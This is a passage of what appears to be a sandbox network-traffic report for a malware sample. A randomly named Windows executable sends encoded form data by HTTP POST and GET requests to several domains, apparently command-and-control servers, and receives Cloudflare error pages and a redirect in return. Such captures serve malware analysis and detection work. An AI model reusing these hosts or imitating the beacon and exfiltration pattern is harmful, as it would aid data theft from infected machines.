                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.455003023 CEST3867OUTData Raw: 38 68 6c 2b 62 49 53 79 7a 66 4e 63 2b 72 67 45 47 45 75 66 78 68 58 46 6b 2f 4e 59 31 32 51 78 73 54 7a 6a 39 71 46 62 65 4b 72 6c 41 6f 52 72 46 54 34 66 63 4f 2f 34 2f 57 36 5a 2f 56 54 55 72 7a 53 35 32 47 72 59 64 37 6a 2f 64 6c 78 39 39 6f
                                                                                                                                                                                                                        Data Ascii: 8hl+bISyzfNc+rgEGEufxhXFk/NY12QxsTzj9qFbeKrlAoRrFT4fcO/4/W6Z/VTUrzS52GrYd7j/dlx99oVpYBIWqt4z7c6PWJjb7qlW/xaRl0kx6pOwOjTD/K4tkuJSmjUuptpHWUriyBMin5K8IQInh15XQUu7JEP3Bi6mIWVtn9YvKUAsdvS0Yo0ERdweoJPFapzpJlhF3dmNb/rMd9UBn3R84M9ppHDq1lFxJATvWv2YP9f
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.455051899 CEST2821OUTData Raw: 79 63 62 6b 48 47 63 61 4a 57 62 50 4b 6f 76 71 48 6a 74 70 56 6b 6e 30 35 32 51 7a 70 34 45 4f 36 4c 68 74 63 6e 48 79 4b 2b 53 42 30 68 77 64 36 39 78 50 76 79 35 76 32 78 71 50 30 53 30 6c 79 45 55 42 4a 63 7a 59 78 78 4c 39 51 73 62 49 4c 39
                                                                                                                                                                                                                        Data Ascii: ycbkHGcaJWbPKovqHjtpVkn052Qzp4EO6LhtcnHyK+SB0hwd69xPvy5v2xqP0S0lyEUBJczYxxL9QsbIL9Wbtq3/JpQkY0H8M5nlKGX2vDp9//2TsXzV3WWIL1XHohBSgc+CMpfGhsTTxIHQJzcwHkvwmQmTxYUrYkIg4dW82wY127fYelPaNDR7fZLN5+O6Uq/WmvEsQ4Xi+OVD4te5Z/a1qVpWMgyDs8p5UL+JDp49ymAdrEt
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798933029 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:00 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fk7FBYVHa0E78EVZ53FiiixP9nRDBelI8kawBvCbwd2RuGSnATKbdZFN1fR3oWGiPcAEpikonGrC%2B9XcK%2BDMSN%2BDrV3QojL1Qr441spDJsLV9TouiB%2B4Du4ABTYrL5ETsrS3kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340942ce71971-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95196&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7977&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web serv
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798960924 CEST1289INData Raw: 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76
                                                                                                                                                                                                                        Data Ascii: er is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" />
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799137115 CEST1289INData Raw: 22 63 6c 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76
                                                                                                                                                                                                                        Data Ascii: "clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-cent
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799206972 CEST1289INData Raw: 6f 6c 75 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a
                                                                                                                                                                                                                        Data Ascii: olute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799340963 CEST1289INData Raw: 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                        Data Ascii: </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799361944 CEST1289INData Raw: 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d 45 72 72 6f 72 2d 35 32 30 22 3e
                                                                                                                                                                                                                        Data Ascii: rrer" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799374104 CEST386INData Raw: 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d
                                                                                                                                                                                                                        Data Ascii: p"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;docum


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        24192.168.11.2049816172.67.148.133805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.081058025 CEST535OUTGET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.421797037 CEST952INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:03 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJH%2F8GDa2bd3Ke9LMRTaVpHML5svpH%2F28tF0%2FnaStVXSKFhuaYUInme%2BSz7ALE4qR7EX%2Fv93Zmp0Y9%2BYlOpOFUBCAk%2FKEQVzEW0%2FbenxKYp%2FxwpOSiuSKjvejFM%2FR75OzjcB%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340a49c924302-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                                                                                                                                                                                                        Data Ascii: error code: 520


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        25192.168.11.20498173.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.699902058 CEST817OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 77 68 57 52 4d 4b 66 7a 48 6e 61 2f 63 42 7a 63 53 69 73 34 6e 2f 44 4b 6c 31 48 33 44 6d 58 6b 30 7a 72 61 71 6f 76 4c 6f 6d 4f 70 6a 4b 75 59 7a 78 4a 45 6a 7a 59 42 41 63 54 41 64 30 50 67 49 58 39 66 63 78 75 32 31 4c 4f 6f 78 35 4f 54 47 4f 6a 54 30 39 4e 54 4b 34 58 4e 67 71 39 71 68 67 6e 6f 6e 75 52 6e 6a 77 61 52 6f 49 4d 74 4a 39 53 79 2f 61 39 4b 2b 50 31 79 69 73 79 75 65 2b 4e 55 65 7a 66 70 32 49 79 45 46 79 70 4b 77 4e 32 66 65 64 59 70 5a 47 38 68 37 6b 7a 66 5a 46 30 6b 57 72 68 5a 6b 44 43 59 57 7a 67 34 6a 52 4c 67 33 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV3whWRMKfzHna/cBzcSis4n/DKl1H3DmXk0zraqovLomOpjKuYzxJEjzYBAcTAd0PgIX9fcxu21LOox5OTGOjT09NTK4XNgq9qhgnonuRnjwaRoIMtJ9Sy/a9K+P1yisyue+NUezfp2IyEFypKwN2fedYpZG8h7kzfZF0kWrhZkDCYWzg4jRLg3A==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        26192.168.11.20498183.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.332071066 CEST837OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 32 42 6d 52 4e 72 66 7a 50 6e 61 38 51 68 7a 63 45 53 73 43 6e 2f 48 4b 6c 30 43 73 43 51 6e 6b 30 54 62 61 72 71 58 4c 74 6d 4f 70 36 36 75 64 75 42 4a 66 6a 7a 55 7a 41 63 76 41 64 30 62 67 49 53 5a 66 63 67 75 70 36 37 4f 71 71 70 4f 56 4a 75 6a 54 30 39 4e 54 4b 37 72 72 67 71 46 71 67 51 33 6f 6e 4c 6c 6d 2f 67 61 53 2b 59 4d 74 66 39 53 32 2f 61 39 34 2b 4f 5a 49 69 75 36 75 65 2f 39 55 66 6e 4c 75 76 34 79 43 64 53 6f 5a 6a 4e 43 61 56 75 30 6f 65 55 77 34 39 55 2f 52 52 7a 35 2b 4c 5a 56 39 6e 51 65 71 53 44 5a 51 68 54 4b 37 71 48 57 78 48 6e 35 59 43 50 73 39 54 38 4a 73 35 44 78 32 53 64 30 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCQnk0TbarqXLtmOp66uduBJfjzUzAcvAd0bgISZfcgup67OqqpOVJujT09NTK7rrgqFqgQ3onLlm/gaS+YMtf9S2/a94+OZIiu6ue/9UfnLuv4yCdSoZjNCaVu0oeUw49U/RRz5+LZV9nQeqSDZQhTK7qHWxHn5YCPs9T8Js5Dx2Sd0=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        27192.168.11.20498193.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976592064 CEST2578OUTPOST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 32 42 6d 52 4e 72 66 7a 50 6e 61 38 51 68 7a 63 45 53 73 43 6e 2f 48 4b 6c 30 43 73 43 54 48 6b 30 68 54 61 71 4c 58 4c 71 6d 4f 70 6c 4b 75 63 75 42 49 64 6a 33 77 33 41 63 6a 51 64 33 6a 67 4a 78 68 66 4e 6c 4f 70 74 72 4f 71 31 35 4f 55 47 4f 6a 38 30 39 63 59 4b 34 54 72 67 71 46 71 67 57 7a 6f 67 65 52 6d 73 51 61 52 6f 49 4e 73 4a 39 54 70 2f 63 56 6f 2b 4f 64 69 69 2b 61 75 51 2f 74 55 5a 52 33 75 6d 34 79 41 49 53 70 65 6a 4e 66 4b 56 75 6f 7a 65 56 45 47 39 56 6e 52 54 30 51 42 65 72 39 53 2f 7a 36 79 66 6e 56 35 32 77 36 61 72 47 75 55 41 32 56 56 4a 37 4a 71 54 76 70 67 6f 41 5a 47 45 4a 44 2b 77 57 59 32 7a 38 71 66 5a 2b 4a 6a 6c 38 66 53 4b 45 65 55 68 6f 5a 57 52 75 77 79 79 2b 6b 32 6e 79 62 4a 56 61 6b 4c 41 79 71 2f 72 65 2f 4f 66 4d 71 35 79 54 59 61 46 71 78 57 4f 35 45 44 77 69 4e 78 49 39 6f 46 42 69 38 35 7a 37 34 39 55 64 64 77 4d 57 49 66 4a 65 30 4a 77 73 55 52 44 68 67 71 79 36 6e 64 74 55 4d 53 6e 78 2b 55 30 39 6f 58 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCTHk0hTaqLXLqmOplKucuBIdj3w3AcjQd3jgJxhfNlOptrOq15OUGOj809cYK4TrgqFqgWzogeRmsQaRoINsJ9Tp/cVo+Odii+auQ/tUZR3um4yAISpejNfKVuozeVEG9VnRT0QBer9S/z6yfnV52w6arGuUA2VVJ7JqTvpgoAZGEJD+wWY2z8qfZ+Jjl8fSKEeUhoZWRuwyy+k2nybJVakLAyq/re/OfMq5yTYaFqxWO5EDwiNxI9oFBi85z749UddwMWIfJe0JwsURDhgqy6ndtUMSnx+U09oXed4oYo33eZ/vfTBioSg/zGQ+BgbQhILa4p0ctxKoM6cFkjLmNySjqAHiw/knpjKgLaeS34HgPDLw+EljOLXUU5pwL5dpyRBf4yeQd7pUaRQRd0S0+8jtUwHj4FemT6lUHVSlPRd8cWT2w2L0GBt78kWng60lbE74eHO8FlamDIvaKf1EOflKeZQ4rQIeFeDtU9y+PUXWUyVzXH+dNfWEtu3WR/3Hnp2yGYaGqVzfe8DcwNU7Xg80ke8bdarTyBH1ggSZpQVwLdKXu+yp2vqj3h7xnsPMP0HmYvOb+0Dxe1EavqXO/Chra7VSt4GS2svSr48d3n+la1skkFL7APb5ijWL7w/5/AdaZLnpuUbMRK8kRiZPp87pE75cC5f06FezztPWiNJsFkrHU4WvK36Qo9FDQOowF1vtYSORZ2OCmasgL1TPpIiSPgh1oEFK8pmysFZeEiw4Ylq7lyU4STowbn0BQXwcxTKet9i78hhj0IbBID0Gpc4QCt0d/rS23DpXNlTnC+K243pFhDqzK5T5uSxrPZ5aS3EeL5ANykGQPN8mTb9UxvZ0MQgTsD/QX3BdvjBS5YyH6SdCQ0sc6j340F3XXjnNuf5vNynEmjE7xmOdMpTI50p8gHHdf2bv0XWbmE4ORsNQaYzq7ZtjJlpZPShuIBKHr1rwYq [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976644039 CEST5408OUTData Raw: 78 4f 31 4a 4d 68 72 5a 2b 4c 46 70 70 69 77 6b 61 58 4f 55 57 55 5a 6e 47 44 59 33 31 6e 58 72 5a 39 37 34 75 62 66 4b 67 2f 6a 33 73 51 43 33 2f 46 48 2b 61 45 2f 65 4c 54 51 36 6d 78 4a 6c 48 57 36 52 69 41 55 36 4a 68 46 54 62 50 38 4f 4e 49
                                                                                                                                                                                                                        Data Ascii: xO1JMhrZ+LFppiwkaXOUWUZnGDY31nXrZ974ubfKg/j3sQC3/FH+aE/eLTQ6mxJlHW6RiAU6JhFTbP8ONIq2G95ciH/nj+atDQ+O5UIKOJiVTLgSliosqIYBqxUYy3xDZvpWVxHxheA+f5FFxYH0ZD9Y0+dowZDN5DQJGIBHXvnUR3BHRlE0hHVm8XjeIgMWr/6vN9bMTY1cISqlJBZA5PLsu/nI8itM22q+s3xpGbAkjkaeSEy


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        28192.168.11.20498203.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.613600016 CEST538OUTGET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657341003 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 42 52 4c 4b 7a 6f 77 63 48 70 46 6b 77 69 43 61 48 4f 6e 70 53 57 6a 6d 58 7a 36 70 52 51 51 62 6c 35 4c 4c 6a 44 71 69 46 68 66 58 34 69 33 58 6f 36 75 6f 6c 79 58 5a 6e 34 6d 31 72 41 42 37 75 77 45 7a 4f 74 48 4e 55 33 6d 5a 4c 52 46 59 4a 79 61 2b 33 64 6d 58 70 4b 2f 4b 4d 65 61 6f 67 50 6f 33 4e 71 6e 55 6a 62 68 49 2b 58 48 71 67 34 34 38 35 77 6f 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        29192.168.11.20498213.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.926263094 CEST802OUTPOST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
